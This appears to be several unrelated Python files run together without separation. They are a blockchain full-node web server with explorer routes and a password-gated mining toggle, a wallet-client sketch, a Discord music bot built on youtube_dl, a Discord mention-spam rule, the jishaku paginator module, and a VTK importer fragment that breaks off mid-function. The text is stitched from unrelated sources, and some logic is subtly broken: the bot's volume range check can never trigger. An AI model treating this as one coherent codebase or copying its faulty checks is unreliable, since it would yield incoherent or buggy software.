    indexes = [i for i in range(prev * 8, (prev + 1) * 8) if i < len(hdr_list)]
    blocks = [Block.from_json(get_block_from_db(dhash(hdr_list[i]))).object() for i in indexes]
    transactions = list(BLOCKCHAIN.mempool)
    return template("explorer.html", blocks=blocks, transactions=transactions, prev=prev)


@app.route("/block/<blockhash>", name="block")
def block(blockhash):
    log_ip(request, inspect.stack()[0][3])
    try:
        block = Block.from_json(get_block_from_db(blockhash)).object()
    except Exception as e:
        logger.debug("BLOCK/blockhash: " + str(e))
        return template("error.html")
    return template("block.html", block=block)


@app.route("/transaction/<blockhash>/<txhash>", name="transaction")
def transaction(blockhash, txhash):
    log_ip(request, inspect.stack()[0][3])
    try:
        block = Block.from_json(get_block_from_db(blockhash)).object()
        tx = None
        for t in block.transactions:
            if t.hash() == txhash:
                tx = t
    except Exception as e:
        logger.debug("Transaction/bhash/tx: " + str(e))
        return template("error.html")
    return template("transaction.html", tx=tx, block=block)


@app.route("/address/<pubkey:re:.+>", name="account")
def account(pubkey):
    log_ip(request, inspect.stack()[0][3])
    balance = check_balance(pubkey)
    tx_hist = BLOCKCHAIN.active_chain.transaction_history.get(pubkey)
    return template("account.html", tx_hist=tx_hist, balance=balance, pubkey=pubkey)


@app.post("/mining")
def mining():
    log_ip(request, inspect.stack()[0][3])
    password = request.body.read().decode("utf-8")
    hashed = b"\x11`\x1e\xdd\xd1\xb6\x80\x0f\xd4\xb0t\x90\x9b\xd3]\xa0\xcc\x1d\x04$\x8b\xb1\x19J\xaa!T5-\x9eJ\xfcI5\xc0\xbb\xf5\xb1\x9d\xba\xbef@\xa1)\xcf\x9b]c(R\x91\x0e\x9dMM\xb6\x94\xa9\xe2\x94il\x15"
    dk = hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"), b"forgeteverythingthatyouthinkyouknow", 200000)
    if hashed == dk:
        consts.NO_MINING = not consts.NO_MINING
        logger.info("Mining: " + str(not consts.NO_MINING))
        return "Mining Toggled, " + ("NOT MINING" if consts.NO_MINING else "MINING")
    else:
        return "Password Mismatch, " + ("NOT MINING" if consts.NO_MINING else "MINING")


@app.route("/<url:re:.+>")
@error(403)
@error(404)
@error(505)
def error_handle(url="url", error="404"):
    log_ip(request, inspect.stack()[0][3])
    return template("error.html")


if __name__ == "__main__":
    try:
        if consts.NEW_BLOCKCHAIN:
            logger.info("FullNode: Starting New Chain from Genesis")
            BLOCKCHAIN.add_block(genesis_block)
        else:
            # Restore Blockchain
            logger.info("FullNode: Restoring Existing Chain")
            header_list = read_header_list_from_db()
            BLOCKCHAIN.build_from_header_list(header_list)

        # Sync with all my peers
        sync_with_peers()

        # Start mining Thread
        Thread(target=start_mining_thread, daemon=True).start()
        if consts.NO_MINING:
            logger.info("FullNode: Not Mining")

        # Start server
        if LINE_PROFILING:
            from wsgi_lineprof.middleware import LineProfilerMiddleware

            with open("lineprof" + str(consts.MINER_SERVER_PORT) + ".log", "w") as f:
                app = LineProfilerMiddleware(app, stream=f, async_stream=True)
                waitress.serve(app, host="0.0.0.0", threads=16, port=consts.MINER_SERVER_PORT)
        else:
            waitress.serve(app, host="0.0.0.0", threads=16, port=consts.MINER_SERVER_PORT)
    except KeyboardInterrupt:
        miner.stop_mining()
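# ---------------------------------------------------------------------------
# Illustrative client sketch, not part of the node above: how a wallet client
# might call the JSON endpoints this server exposes. The node address and the
# keys below are hypothetical placeholders, not values from the project.
import requests

NODE = "http://localhost:9000"  # assumed address of a running full node

# /checkBalance reads request.json, so the public key goes in a JSON body
balance = requests.post(NODE + "/checkBalance", json={"public_key": "<pubkey>"}).text

# /makeTransaction returns a payload to broadcast ("send_this") and one to sign ("sign_this")
tx = requests.post(
    NODE + "/makeTransaction",
    json={"bounty": 10, "receiver_public_key": "<receiver>", "sender_public_key": "<sender>"},
).json()

# The client signs tx["sign_this"] offline, then submits the signature to /sendTransaction
requests.post(NODE + "/sendTransaction", json={"transaction": tx["send_this"], "signature": "<sig>"})
# ---------------------------------------------------------------------------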
import discord
from discord.ext import commands

import asyncio
import functools
import itertools
import random

import youtube_dl
import async_timeout

try:
    import uvloop
except ImportError:
    pass
else:
    asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())


class VoiceError(Exception):
    pass


class YTDLError(Exception):
    pass


class YTDLSource(discord.PCMVolumeTransformer):
    YTDL_OPTIONS = {
        "format": "bestaudio/best",
        "extractaudio": True,
        "outtmpl": "%(extractor)s-%(id)s-%(title)s.%(ext)s",
        "restrictfilenames": True,
        "noplaylist": True,
        "nocheckcertificate": True,
        "ignoreerrors": False,
        "logtostderr": False,
        "quiet": True,
        "no_warnings": True,
        "default_search": "ytsearch",
        "source_address": "0.0.0.0",
    }

    FFMPEG_OPTIONS = {
        "before_options": "-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5",
        "options": "-vn",
    }

    ytdl = youtube_dl.YoutubeDL(YTDL_OPTIONS)
    ytdl.cache.remove()

    def __init__(
        self,
        ctx: commands.Context,
        source: discord.FFmpegPCMAudio,
        *,
        data: dict,
        volume: float = 0.5,
    ):
        super().__init__(source, volume)

        self.requester = ctx.author
        self.channel = ctx.channel
        self.data = data

        self.uploader = data.get("uploader")
        self.uploader_url = data.get("uploader_url")
        date = data.get("upload_date")
        self.upload_date = date[6:8] + "." + date[4:6] + "." + date[0:4]
        self.title = data.get("title")
        self.thumbnail = data.get("thumbnail")
        self.description = data.get("description")
        self.duration = self.parse_duration(int(data.get("duration")))
        self.tags = data.get("tags")
        self.url = data.get("webpage_url")
        self.views = data.get("view_count")
        self.likes = data.get("like_count")
        self.dislikes = data.get("dislike_count")
        self.stream_url = data.get("url")

    def __str__(self):
        return f"**{self.title}** by **{self.uploader}**"

    @classmethod
    async def create_source(
        cls, ctx: commands.Context, search: str, *, loop: asyncio.BaseEventLoop = None
    ):
        loop = loop or asyncio.get_event_loop()

        partial = functools.partial(
            cls.ytdl.extract_info, search, download=False, process=False
        )
        data = await loop.run_in_executor(None, partial)

        if data is None:
            raise YTDLError(f"Couldn't find anything that matches `{search}`")

        if "entries" not in data:
            process_info = data
        else:
            process_info = None
            for entry in data["entries"]:
                if entry:
                    process_info = entry
                    break

            if process_info is None:
                raise YTDLError(f"Couldn't find anything that matches `{search}`")

        webpage_url = process_info["webpage_url"]
        partial = functools.partial(cls.ytdl.extract_info, webpage_url, download=False)
        processed_info = await loop.run_in_executor(None, partial)

        if processed_info is None:
            raise YTDLError(f"Couldn't fetch `{webpage_url}`")

        if "entries" not in processed_info:
            info = processed_info
        else:
            info = None
            while info is None:
                try:
                    info = processed_info["entries"].pop(0)
                except IndexError:
                    raise YTDLError(
                        f"Couldn't retrieve any matches for `{webpage_url}`"
                    )

        return cls(
            ctx, discord.FFmpegPCMAudio(info["url"], **cls.FFMPEG_OPTIONS), data=info
        )

    @classmethod
    async def search_source(
        cls, ctx: commands.Context, search: str, *, loop: asyncio.BaseEventLoop = None
    ):
        channel = ctx.channel
        loop = loop or asyncio.get_event_loop()

        cls.search_query = f"ytsearch10:{''.join(search)}"

        partial = functools.partial(
            cls.ytdl.extract_info, cls.search_query, download=False, process=False
        )
        info = await loop.run_in_executor(None, partial)

        cls.search = {}
        cls.search["title"] = f"Search results for:\n**{search}**"
        cls.search["type"] = "rich"
        cls.search["color"] = 7506394
        cls.search["author"] = {
            "name": f"{ctx.author.name}",
            "url": f"{ctx.author.avatar_url}",
            "icon_url": f"{ctx.author.avatar_url}",
        }

        lst = []
        VIds = []

        for index, e in enumerate(info["entries"]):
            # lst.append(f'`{info["entries"].index(e) + 1}.` {e.get("title")} **[{YTDLSource.parse_duration(int(e.get("duration")))}]**\n')
            VId = e.get("id")
            VUrl = f"https://www.youtube.com/watch?v={VId}"
            VIds.append(VId)
            lst.append(f'`{index + 1}.` [{e.get("title")}]({VUrl})\n')

        lst.append("\n**Type a number to make a choice, Type `cancel` to exit**")
        cls.search["description"] = "\n".join(lst)

        em = discord.Embed.from_dict(cls.search)
        await ctx.send(embed=em, delete_after=45.0)

        def check(msg):
            # only accept a digit or "cancel" typed in the channel the search
            # was started in
            return msg.channel == channel and (
                msg.content.isdigit() or msg.content.lower() == "cancel"
            )

        try:
            m = await ctx.bot.wait_for("message", check=check, timeout=45.0)
        except asyncio.TimeoutError:
            rtrn = "timeout"
        else:
            if m.content.isdigit():
                sel = int(m.content)
                if 0 < sel <= 10:
                    if info.get("entries"):
                        VId = VIds[sel - 1]
                        VUrl = f"https://www.youtube.com/watch?v={VId}"
                        partial = functools.partial(
                            cls.ytdl.extract_info, VUrl, download=False
                        )
                        data = await loop.run_in_executor(None, partial)
                    rtrn = cls(
                        ctx,
                        discord.FFmpegPCMAudio(data["url"], **cls.FFMPEG_OPTIONS),
                        data=data,
                    )
                else:
                    rtrn = "sel_invalid"
            elif m.content.lower() == "cancel":
                rtrn = "cancel"
            else:
                rtrn = "sel_invalid"

        return rtrn

    @staticmethod
    def parse_duration(duration: int):
        if duration > 0:
            minutes, seconds = (duration // 60, duration % 60)
            hours, minutes = (minutes // 60, minutes % 60)
            days, hours = (hours // 24, hours % 24)

            duration = []
            if days > 0:
                duration.append(f"{days}")
            if hours > 0:
                duration.append(f"{hours}")
            if minutes > 0:
                duration.append(f"{minutes}")
            if seconds >= 0:
                duration.append(f"{seconds:0>2}")

            value = ":".join(duration)
        else:
            # 0 (or anything non-positive) is reported as a live stream,
            # so value is always bound
            value = "LIVE"

        return value


class Song:
    __slots__ = ("source", "requester")

    def __init__(self, source: YTDLSource):
        self.source = source
        self.requester = source.requester

    def create_embed(self):
        if self.source.duration == "":
            DURATION = "/"
        else:
            DURATION = self.source.duration

        embed = (
            discord.Embed(
                title="Now playing",
                description=f"```css\n{self.source.title}\n```",
                color=discord.Color.blurple(),
            )
            .add_field(name="Duration", value=DURATION)
            .add_field(name="Requested by", value=self.requester.mention)
            .add_field(
                name="Uploader",
                value=f"[{self.source.uploader}]({self.source.uploader_url})",
            )
            .add_field(name="URL", value=f"[Click]({self.source.url})")
            .set_thumbnail(url=self.source.thumbnail)
            .set_author(name=self.requester.name, icon_url=self.requester.avatar_url)
        )
        return embed


class SongQueue(asyncio.Queue):
    def __getitem__(self, item):
        if isinstance(item, slice):
            return list(itertools.islice(self._queue, item.start, item.stop, item.step))
        return self._queue[item]

    def __iter__(self):
        return self._queue.__iter__()

    def __len__(self):
        return self.qsize()

    def clear(self):
        self._queue.clear()

    def shuffle(self):
        random.shuffle(self._queue)

    def remove(self, index: int):
        del self._queue[index]


class VoiceState:
    def __init__(self, bot: commands.Bot, ctx: commands.Context):
        self.bot = bot
        self._ctx = ctx

        self.current = None
        self.voice = None
        self.next = asyncio.Event()
        self.songs = SongQueue()
        self.exists = True

        self._loop = False
        self._volume = 0.5
        self.skip_votes = set()

        self.audio_player = bot.loop.create_task(self.audio_player_task())

    def __del__(self):
        self.audio_player.cancel()

    @property
    def loop(self):
        return self._loop

    @loop.setter
    def loop(self, value: bool):
        self._loop = value

    @property
    def volume(self):
        return self._volume

    @volume.setter
    def volume(self, value: float):
self._volume = value @property def is_playing(self): return self.voice and self.current async def audio_player_task(self): while True: self.next.clear() self.now = None if self.loop is False: # Try to get the next song within 3 minutes. # If no song will be added to the queue in time, # the player will disconnect due to performance # reasons. try: async with async_timeout.timeout(180): # 3 minutes self.current = await self.songs.get() except asyncio.TimeoutError: self.bot.loop.create_task(self.stop()) self.exists = False return self.current.source.volume = self._volume self.voice.play(self.current.source, after=self.play_next_song) await self.current.source.channel.send( embed=self.current.create_embed() ) # If the song is looped elif self.loop is True: self.now = discord.FFmpegPCMAudio( self.current.source.stream_url, **YTDLSource.FFMPEG_OPTIONS ) self.voice.play(self.now, after=self.play_next_song) await self.next.wait() def play_next_song(self, error=None): if error: raise VoiceError(str(error)) self.next.set() def skip(self): self.skip_votes.clear() if self.is_playing: self.voice.stop() async def stop(self): self.songs.clear() if self.voice: await self.voice.disconnect() self.voice = None class music(commands.Cog): """Commands related to music.""" def __init__(self, bot: commands.Bot): self.bot = bot self.voice_states = {} def get_voice_state(self, ctx: commands.Context): state = self.voice_states.get(ctx.guild.id) if not state or not state.exists: state = VoiceState(self.bot, ctx) self.voice_states[ctx.guild.id] = state return state def cog_unload(self): for state in self.voice_states.values(): self.bot.loop.create_task(state.stop()) def cog_check(self, ctx: commands.Context): if not ctx.guild: raise commands.NoPrivateMessage(self.__cog_name__) return True async def cog_before_invoke(self, ctx: commands.Context): ctx.voice_state = self.get_voice_state(ctx) @commands.command(name="join") async def _join(self, ctx: commands.Context): """Joins your current voice channel.""" destination = ctx.author.voice.channel if ctx.voice_state.voice: await ctx.voice_state.voice.move_to(destination) return ctx.voice_state.voice = await destination.connect() @commands.command(name="summon") async def _summon( self, ctx: commands.Context, *, channel: discord.VoiceChannel = None ): """Summons the bot to a voice channel. channel: discord.VoiceChannel The channel to join defaulting to your voice channel. """ if not channel and not ctx.author.voice: raise VoiceError( "You are neither connected to a voice channel nor specified a channel to join." ) destination = channel or ctx.author.voice.channel if ctx.voice_state.voice: await ctx.voice_state.voice.move_to(destination) return ctx.voice_state.voice = await destination.connect() @commands.command(name="leave", aliases=["disconnect"]) async def _leave(self, ctx: commands.Context): """Clears the queue and leaves the voice channel.""" if not ctx.voice_state.voice: return await ctx.send("Not connected to any voice channel.") await ctx.voice_state.stop() del self.voice_states[ctx.guild.id] @commands.command(name="volume") async def _volume(self, ctx: commands.Context, *, volume: int): """Sets the volume of the player. volume: int The volume to be set from 0% to 100%. 
""" if not ctx.voice_state.is_playing: return await ctx.send("Nothing being played at the moment.") if 0 > volume > 100: return await ctx.send("Volume must be between 0 and 100") ctx.voice_state.current.source.volume = volume / 100 await ctx.send(f"Volume of the player set to {volume}%") @commands.command(name="now", aliases=["current", "playing", "n"]) async def _now(self, ctx: commands.Context): """Displays the currently playing song.""" embed = ctx.voice_state.current.create_embed() await ctx.send(embed=embed) @commands.command(name="pause", aliases=["pa"]) async def _pause(self, ctx: commands.Context): """Pauses the currently playing song.""" if ctx.voice_state.voice.is_playing(): ctx.voice_state.voice.pause() await ctx.message.add_reaction("⏯") @commands.command(name="resume", aliases=["re", "res"]) async def _resume(self, ctx: commands.Context): """Resumes a currently paused song.""" if ctx.voice_state.voice.is_paused(): ctx.voice_state.voice.resume() await ctx.message.add_reaction("⏯") @commands.command(name="stop") async def _stop(self, ctx: commands.Context): """Stops playing song and clears the queue.""" ctx.voice_state.songs.clear() if ctx.voice_state.is_playing: ctx.voice_state.voice.stop() await ctx.message.add_reaction("⏹") @commands.command(name="skip", aliases=["s", "sk"]) async def _skip(self, ctx: commands.Context): """Vote to skip a song.""" if not ctx.voice_state.is_playing: return await ctx.send("Not playing any music right now...") voter = ctx.author if voter == ctx.voice_state.current.requester: await ctx.message.add_reaction("⏭") ctx.voice_state.loop = False ctx.voice_state.skip() elif voter.id not in ctx.voice_state.skip_votes: ctx.voice_state.skip_votes.add(voter.id) total_votes = len(ctx.voice_state.skip_votes) if total_votes >= 1: await ctx.message.add_reaction("⏭") ctx.voice_state.loop = False ctx.voice_state.skip() else: await ctx.send(f"Skip vote added, currently at **{total_votes}/1**") else: await ctx.send("You have already voted to skip this song.") @commands.command(name="queue", aliases=["q"]) async def _queue(self, ctx: commands.Context, *, page: int = 1): """Shows the player's queue. page: int The page to display defaulting to the first page. """ if len(ctx.voice_state.songs) == 0: return await ctx.send("Empty queue.") items_per_page = 10 # -(-3//2) == 2, just gets the ceil pages = -(-len(ctx.voice_state.songs) // items_per_page) start = (page - 1) * items_per_page end = start + items_per_page queue = "" for i, song in enumerate(ctx.voice_state.songs[start:end], start=start): queue += f"`{i + 1}.` [**{song.source.title}**]({song.source.url})\n" embed = discord.Embed( description=f"**{len(ctx.voice_state.songs)} tracks:**\n\n{queue}" ).set_footer(text=f"Viewing page {page}/{pages}") await ctx.send(embed=embed) @commands.command(name="shuffle") async def _shuffle(self, ctx: commands.Context): """Shuffles the queue.""" if len(ctx.voice_state.songs) == 0: return await ctx.send("Empty queue.") ctx.voice_state.songs.shuffle() await ctx.message.add_reaction("✅") @commands.command(name="remove") async def _remove(self, ctx: commands.Context, index: int): """Removes a song from the queue at a given index. index: int The index of the song to remove. 
""" if len(ctx.voice_state.songs) == 0: return await ctx.send("Empty queue.") ctx.voice_state.songs.remove(index - 1) await ctx.message.add_reaction("✅") @commands.command(name="loop") async def _loop(self, ctx: commands.Context): """Loops the currently playing song.""" if not ctx.voice_state.is_playing: return await ctx.send("Nothing being played at the moment.") ctx.voice_state.loop = not ctx.voice_state.loop await ctx.message.add_reaction("✅") @commands.command(name="play", aliases=["p"]) async def _play(self, ctx: commands.Context, *, search: str): """Plays a song. searcch: str The song to search for. """ async with ctx.typing(): try: source = await YTDLSource.create_source(ctx, search, loop=self.bot.loop) except YTDLError: pass else: if not ctx.voice_state.voice: await ctx.invoke(self._join) song = Song(source) await ctx.voice_state.songs.put(song) await ctx.send(f"Enqueued {source}") @commands.command(name="search") async def _search(self, ctx: commands.Context, *, search: str): """Searches youtube. search: str The song to search youtube for. It returns an imbed of the first 10 results collected from youtube. Then the member can choose one of the titles by typing a number in chat or they can cancel by typing "cancel" in chat. """ async with ctx.typing(): try: source = await YTDLSource.search_source(ctx, search, loop=self.bot.loop) except YTDLError as e: await ctx.send(f"An error occurred while processing this request: {e}") else: if source == "sel_invalid": await ctx.send("Invalid selection") elif source == "cancel": await ctx.send(":white_check_mark:") elif source == "timeout": await ctx.send(":alarm_clock: **Time's up bud**") else: if not ctx.voice_state.voice: await ctx.invoke(self._join) song = Song(source) await ctx.voice_state.songs.put(song) await ctx.send(f"Enqueued {source}") @_join.before_invoke @_play.before_invoke async def ensure_voice_state(self, ctx: commands.Context): if not ctx.author.voice or not ctx.author.voice.channel: raise commands.CommandError("You are not connected to any voice channel.") if ctx.voice_client and ctx.voice_client.channel != ctx.author.voice.channel: raise commands.CommandError("Bot is already in a voice channel.") def setup(bot: commands.Bot) -> None: """Starts music cog.""" bot.add_cog(music(bot))
from typing import Dict, Iterable, List, Optional, Tuple from discord import Member, Message async def apply( last_message: Message, recent_messages: List[Message], config: Dict[str, int] ) -> Optional[Tuple[str, Iterable[Member], Iterable[Message]]]: """Detects total mentions exceeding the limit sent by a single user.""" relevant_messages = tuple( msg for msg in recent_messages if msg.author == last_message.author ) total_recent_mentions = sum(len(msg.mentions) for msg in relevant_messages) if total_recent_mentions > config['max']: return ( f"sent {total_recent_mentions} mentions in {config['interval']}s", (last_message.author,), relevant_messages ) return None
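

# --- Illustrative sketch (not part of the rule above) ---
# How a caller might evaluate apply(); the config keys `max` and `interval`
# match the lookups above, but the surrounding harness (message objects,
# event loop) is assumed for illustration.
async def run_rule(last_message, recent_messages):
    config = {"max": 5, "interval": 10}  # at most 5 mentions per 10-second window
    result = await apply(last_message, recent_messages, config)
    if result is not None:
        reason, members, messages = result
        print(f"triggered: {reason} ({len(messages)} messages)")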
# -*- coding: utf-8 -*- """ jishaku.paginators ~~~~~~~~~~~~~~~~~~ Paginator-related tools and interfaces for Jishaku. :copyright: (c) 2020 Devon (Gorialis) R :license: MIT, see LICENSE for more details. """ import asyncio import collections import re import discord from discord.ext import commands from jishaku.hljs import get_language __all__ = ('EmojiSettings', 'PaginatorInterface', 'PaginatorEmbedInterface', 'WrappedPaginator', 'FilePaginator') # emoji settings, this sets what emoji are used for PaginatorInterface EmojiSettings = collections.namedtuple('EmojiSettings', 'start back forward end close') EMOJI_DEFAULT = EmojiSettings( start="\N{BLACK LEFT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}", back="\N{BLACK LEFT-POINTING TRIANGLE}", forward="\N{BLACK RIGHT-POINTING TRIANGLE}", end="\N{BLACK RIGHT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}", close="\N{BLACK SQUARE FOR STOP}" ) class PaginatorInterface: # pylint: disable=too-many-instance-attributes """ A message and reaction based interface for paginators. """ def __init__(self, bot: commands.Bot, paginator: commands.Paginator, **kwargs): if not isinstance(paginator, commands.Paginator): raise TypeError('paginator must be a commands.Paginator instance') self._display_page = 0 self.bot = bot self.message = None self.paginator = paginator self.owner = kwargs.pop('owner', None) self.emojis = kwargs.pop('emoji', EMOJI_DEFAULT) self.timeout = kwargs.pop('timeout', 7200) self.delete_message = kwargs.pop('delete_message', False) self.sent_page_reactions = False self.task: asyncio.Task = None self.send_lock: asyncio.Event = asyncio.Event() self.update_lock: asyncio.Lock = asyncio.Semaphore(value=kwargs.pop('update_max', 2)) if self.page_size > self.max_page_size: raise ValueError( f'Paginator passed has too large of a page size for this interface. ' f'({self.page_size} > {self.max_page_size})' ) @property def pages(self): """ Returns the paginator's pages without prematurely closing the active page. """ # protected access has to be permitted here to not close the paginator's pages # pylint: disable=protected-access paginator_pages = list(self.paginator._pages) if len(self.paginator._current_page) > 1: paginator_pages.append('\n'.join(self.paginator._current_page) + '\n' + (self.paginator.suffix or '')) # pylint: enable=protected-access return paginator_pages @property def page_count(self): """ Returns the page count of the internal paginator. """ return len(self.pages) @property def display_page(self): """ Returns the current page the paginator interface is on. """ self._display_page = max(0, min(self.page_count - 1, self._display_page)) return self._display_page @display_page.setter def display_page(self, value): """ Sets the current page the paginator is on. Automatically pushes values inbounds. """ self._display_page = max(0, min(self.page_count - 1, value)) max_page_size = 2000 @property def page_size(self) -> int: """ A property that returns how large a page is, calculated from the paginator properties. If this exceeds `max_page_size`, an exception is raised upon instantiation. """ page_count = self.page_count return self.paginator.max_size + len(f'\nPage {page_count}/{page_count}') @property def send_kwargs(self) -> dict: """ A property that returns the kwargs forwarded to send/edit when updating the page. As this must be compatible with both `discord.TextChannel.send` and `discord.Message.edit`, it should be a dict containing 'content', 'embed' or both. 
""" display_page = self.display_page page_num = f'\nPage {display_page + 1}/{self.page_count}' content = self.pages[display_page] + page_num return {'content': content} async def add_line(self, *args, **kwargs): """ A proxy function that allows this PaginatorInterface to remain locked to the last page if it is already on it. """ display_page = self.display_page page_count = self.page_count self.paginator.add_line(*args, **kwargs) new_page_count = self.page_count if display_page + 1 == page_count: # To keep position fixed on the end, update position to new last page and update message. self._display_page = new_page_count self.bot.loop.create_task(self.update()) async def send_to(self, destination: discord.abc.Messageable): """ Sends a message to the given destination with this interface. This automatically creates the response task for you. """ self.message = await destination.send(**self.send_kwargs) # add the close reaction await self.message.add_reaction(self.emojis.close) self.send_lock.set() if self.task: self.task.cancel() self.task = self.bot.loop.create_task(self.wait_loop()) # if there is more than one page, and the reactions haven't been sent yet, send navigation emotes if not self.sent_page_reactions and self.page_count > 1: await self.send_all_reactions() return self async def send_all_reactions(self): """ Sends all reactions for this paginator, if any are missing. This method is generally for internal use only. """ for emoji in filter(None, self.emojis): try: await self.message.add_reaction(emoji) except discord.NotFound: # the paginator has probably already been closed break self.sent_page_reactions = True @property def closed(self): """ Is this interface closed? """ if not self.task: return False return self.task.done() async def wait_loop(self): """ Waits on a loop for reactions to the message. This should not be called manually - it is handled by `send_to`. """ start, back, forward, end, close = self.emojis def check(payload: discord.RawReactionActionEvent): """ Checks if this reaction is related to the paginator interface. """ owner_check = not self.owner or payload.user_id == self.owner.id emoji = payload.emoji if isinstance(emoji, discord.PartialEmoji) and emoji.is_unicode_emoji(): emoji = emoji.name tests = ( owner_check, payload.message_id == self.message.id, emoji, emoji in self.emojis, payload.user_id != self.bot.user.id ) return all(tests) try: while not self.bot.is_closed(): payload = await self.bot.wait_for('raw_reaction_add', check=check, timeout=self.timeout) emoji = payload.emoji if isinstance(emoji, discord.PartialEmoji) and emoji.is_unicode_emoji(): emoji = emoji.name if emoji == close: await self.message.delete() return if emoji == start: self._display_page = 0 elif emoji == end: self._display_page = self.page_count - 1 elif emoji == back: self._display_page -= 1 elif emoji == forward: self._display_page += 1 self.bot.loop.create_task(self.update()) try: await self.message.remove_reaction(payload.emoji, discord.Object(id=payload.user_id)) except discord.Forbidden: pass except (asyncio.CancelledError, asyncio.TimeoutError): if self.delete_message: return await self.message.delete() for emoji in filter(None, self.emojis): try: await self.message.remove_reaction(emoji, self.bot.user) except (discord.Forbidden, discord.NotFound): pass async def update(self): """ Updates this interface's messages with the latest data. 
""" if self.update_lock.locked(): return await self.send_lock.wait() async with self.update_lock: if self.update_lock.locked(): # if this engagement has caused the semaphore to exhaust, # we are overloaded and need to calm down. await asyncio.sleep(1) if not self.message: # too fast, stagger so this update gets through await asyncio.sleep(0.5) if not self.sent_page_reactions and self.page_count > 1: self.bot.loop.create_task(self.send_all_reactions()) self.sent_page_reactions = True # don't spawn any more tasks try: await self.message.edit(**self.send_kwargs) except discord.NotFound: # something terrible has happened if self.task: self.task.cancel() class PaginatorEmbedInterface(PaginatorInterface): """ A subclass of :class:`PaginatorInterface` that encloses content in an Embed. """ def __init__(self, *args, **kwargs): self._embed = kwargs.pop('embed', None) or discord.Embed() self._footer = kwargs.pop('footer', None) or {"text": "", "icon_url": None} super().__init__(*args, **kwargs) @property def send_kwargs(self) -> dict: display_page = self.display_page self._embed.description = self.pages[display_page] footer_text = f'Page {display_page + 1}/{self.page_count}' if self._footer["text"] != "": footer_text = f'{self._footer["text"]} | Page {display_page + 1}/{self.page_count}' if self._footer["icon_url"]: self._embed.set_footer(text=footer_text, icon_url=self._footer["icon_url"]) else: self._embed.set_footer(text=footer_text) return {'embed': self._embed} max_page_size = 2048 @property def page_size(self) -> int: return self.paginator.max_size class WrappedPaginator(commands.Paginator): """ A paginator that allows automatic wrapping of lines should they not fit. This is useful when paginating unpredictable output, as it allows for line splitting on big chunks of data. Delimiters are prioritized in the order of their tuple. Parameters ----------- wrap_on: tuple A tuple of wrapping delimiters. include_wrapped: bool Whether to include the delimiter at the start of the new wrapped line. force_wrap: bool If this is True, lines will be split at their maximum points should trimming not be possible with any provided delimiter. """ def __init__(self, *args, wrap_on=('\n', ' '), include_wrapped=True, force_wrap=False, **kwargs): super().__init__(*args, **kwargs) self.wrap_on = wrap_on self.include_wrapped = include_wrapped self.force_wrap = force_wrap def add_line(self, line='', *, empty=False): true_max_size = self.max_size - self._prefix_len - self._suffix_len - 2 original_length = len(line) while len(line) > true_max_size: search_string = line[0:true_max_size - 1] wrapped = False for delimiter in self.wrap_on: position = search_string.rfind(delimiter) if position > 0: super().add_line(line[0:position], empty=empty) wrapped = True if self.include_wrapped: line = line[position:] else: line = line[position + len(delimiter):] break if not wrapped: if self.force_wrap: super().add_line(line[0:true_max_size - 1]) line = line[true_max_size - 1:] else: raise ValueError( f"Line of length {original_length} had sequence of {len(line)} characters" f" (max is {true_max_size}) that WrappedPaginator could not wrap with" f" delimiters: {self.wrap_on}" ) super().add_line(line, empty=empty) class FilePaginator(commands.Paginator): """ A paginator of syntax-highlighted codeblocks, read from a file-like. Parameters ----------- fp A file-like (implements ``fp.read``) to read the data for this paginator from. line_span: Optional[Tuple[int, int]] A linespan to read from the file. If None, reads the whole file. 
language_hints: Tuple[str] A tuple of strings that may hint to the language of this file. This could include filenames, MIME types, or shebangs. A shebang present in the actual file will always be prioritized over this. """ __encoding_regex = re.compile(br'coding[=:]\s*([-\w.]+)') def __init__(self, fp, line_span=None, language_hints=(), **kwargs): language = '' for hint in language_hints: language = get_language(hint) if language: break if not language: try: language = get_language(fp.name) except AttributeError: pass raw_content = fp.read() try: lines = raw_content.decode('utf-8').split('\n') except UnicodeDecodeError as exc: # This file isn't UTF-8. # By Python and text-editor convention, # there may be a hint as to what the actual encoding is # near the start of the file. encoding_match = self.__encoding_regex.search(raw_content[:128]) if encoding_match: encoding = encoding_match.group(1) else: raise exc try: lines = raw_content.decode(encoding.decode('utf-8')).split('\n') except UnicodeDecodeError as exc2: raise exc2 from exc del raw_content # If the first line is a shebang, if lines[0].startswith('#!'): # prioritize its declaration over the extension. language = get_language(lines[0]) or language super().__init__(prefix=f'```{language}', suffix='```', **kwargs) if line_span: line_span = sorted(line_span) if min(line_span) < 1 or max(line_span) > len(lines): raise ValueError("Linespan goes out of bounds.") lines = lines[line_span[0] - 1:line_span[1]] for line in lines: self.add_line(line) class WrappedFilePaginator(FilePaginator, WrappedPaginator): """ Combination of FilePaginator and WrappedPaginator. In other words, a FilePaginator that supports line wrapping. """
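

# --- Illustrative sketch (not part of the module above) ---
# Minimal use of WrappedPaginator: an over-long line is split on the
# delimiters in wrap_on instead of raising the RuntimeError that a plain
# commands.Paginator would. The page size here is only an example.
paginator = WrappedPaginator(prefix="```", suffix="```", max_size=500)
paginator.add_line("word " * 400)  # far longer than a single page; gets wrapped
for page in paginator.pages:
    print(len(page))  # each page stays under max_size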
import json
import zipfile
import vtk
import re
import struct

from .synchronizable_serializer import arrayTypesMapping

METHODS_RENAME = {
    "AddTexture": "SetTexture",
    "SetUseGradientOpacity": None,
    "SetRGBTransferFunction": "SetColor",
}

WRAP_ID_RE = re.compile(r"instance:\${([^}]+)}")

ARRAY_TYPES = {
    'Int8Array': vtk.vtkCharArray,
    'Uint8Array': vtk.vtkUnsignedCharArray,
    'Int16Array': vtk.vtkShortArray,
    'UInt16Array': vtk.vtkUnsignedShortArray,
    'Int32Array': vtk.vtkIntArray,
    'Uint32Array': vtk.vtkUnsignedIntArray,
    'Float32Array': vtk.vtkFloatArray,
    'Float64Array': vtk.vtkDoubleArray,
}

def capitalize(name):
    "Uppercase the first letter, leaving the rest unchanged"
    return name[0].upper() + name[1:]

def fill_array(vtk_arr, state, zf):
    vtk_arr.SetNumberOfComponents(state['numberOfComponents'])
    vtk_arr.SetNumberOfTuples(state['size']//state['numberOfComponents'])
    data = zf.read('data/%s' % state['hash'])
    dataType = arrayTypesMapping[vtk_arr.GetDataType()]
    elementSize = struct.calcsize(dataType)
    if vtk_arr.GetDataType() == 12:
        # we need to cast the data to Uint64
        import numpy as np
        data = np.frombuffer(data, dtype=np.uint32).astype(np.uint64).tobytes()
        elementSize = 8
